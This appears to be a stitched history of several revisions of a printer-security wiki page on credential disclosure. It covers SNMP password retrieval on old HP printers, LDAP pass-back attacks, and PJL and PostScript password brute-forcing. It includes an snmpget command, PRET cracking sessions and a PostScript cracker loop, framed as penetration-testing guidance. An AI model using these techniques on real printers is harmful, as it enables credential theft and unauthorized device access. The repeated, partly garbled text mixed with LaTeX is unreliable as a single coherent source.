[[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers. '''How to test this attack?''' To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. ---- cfd4191c07c46e2178a2a83bac17bb53e9bba299 188 187 2017-01-22T12:22:36Z Admin 1 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === One remarkable class of attacks to be mentioned is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname without setting a new password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection. == Brute-Force Attacks == Besides credentials leaked from sources like [[#SNMP|SNMP]], the printer's [[#Pass-Back|embedded web server]], [[File system access|file system]] or [[memory access]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' The ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' In case of numeric (integer) passwords, the ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. ---- 02b783c7d35c4f09bfe4bfe76688c0b22e4fb572 187 185 2017-01-22T12:18:23Z Admin 1 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === One remarkable class of attacks to be mentioned is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change printer settings like the LDAP hostname without setting a new password. '''Who can perform this attack?''' Usually anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. == Brute-Force Attacks == Besides credentials leaked from sources like [[#SNMP|SNMP]], the printer's [[#Pass-Back|embedded web server]], [[File system access|file system]] or [[memory access]] printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' The ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PJL passwords: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 PIN protection: ENABLED Panel lock: ON Disk lock: ON printer:/> unlock No PIN given, cracking. PIN protection: DISABLED Panel lock: OFF Disk lock: OFF '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. === PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support permanent PostScript passwords at all. '''How to test this attack?''' In case of numeric (integer) passwords, the ''lock'' and ''unlock'' commands of PRET can be used to test brute-force attacks against PostScript passwords: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> lock 999 printer:/> unlock No password given, cracking. Found password: 999 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job. ---- a77a2ee2fb8ac1765659a96f2ae042aca90401fe 185 184 2017-01-21T12:34:05Z Admin 1 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back === Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda]] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating. If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. <!-- % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services --> \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. === PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % :/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> aa53249f830d7711e49c148bcee67fdc6a9e9797 184 163 2017-01-21T12:03:47Z 134.147.24.29 0 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. '''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back Attacks === Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the 